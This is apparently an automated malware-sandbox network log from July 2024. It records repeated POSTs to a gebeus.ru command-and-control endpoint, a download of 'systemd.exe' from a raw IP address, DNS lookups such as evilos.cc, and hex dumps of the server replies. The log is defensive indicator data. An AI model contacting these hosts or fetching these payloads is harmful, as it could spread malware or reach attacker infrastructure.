Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ikgaobomjngh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dshprjrooia.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gejkxdmasvmxo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jqchsaraxkauihtq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: gebeus.ru
Source: global traffic	HTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gxmmgqbcaaod.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xlokwbpjnmjelwgt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ndqtpbgfxigpiob.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jklgsoopefuhj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cjmjmjmgugawaqj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hurkgkiufjdhatw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://twuefpujaurvfca.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ewsnnfxrccp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://aeqbmojsaplkjy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qhngbjsxhdjts.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vahxvallvgf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://evdyuckmovmlgw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yxdvfnljluug.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hocvueqllial.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kojxnjsmgyh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://woemrmcgjefexq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wkabmnjjuon.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 184Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ifgnsbejriuwteg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dxpeojjvxfrbjrw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rklgpmbjqrvbpp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ddxjeoahbwmlur.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gdirqpperuo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: gebeus.ru

Source: unknown	TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown	TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown	TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown	TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149
Source: unknown	TCP traffic detected without corresponding DNS query: 46.246.96.149

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Code function: 19_2_00C6279E InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

19_2_00C6279E

Source: global traffic	HTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
Source: global traffic	HTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163

Source: global traffic	DNS traffic detected: DNS query: evilos.cc
Source: global traffic	DNS traffic detected: DNS query: gebeus.ru
Source: global traffic	DNS traffic detected: DNS query: mussangroup.com
Source: global traffic	DNS traffic detected: DNS query: FibtGXfABKPepIBYktzWGsNQQZ.FibtGXfABKPepIBYktzWGsNQQZ

Source: unknown

HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qydxnaxywntsme.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: gebeus.ru

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:10:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 ef Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:10:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:10:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:10:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:10:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:10:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:10:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:10:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:10:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb Data Ascii: #\.\$iDm7&W
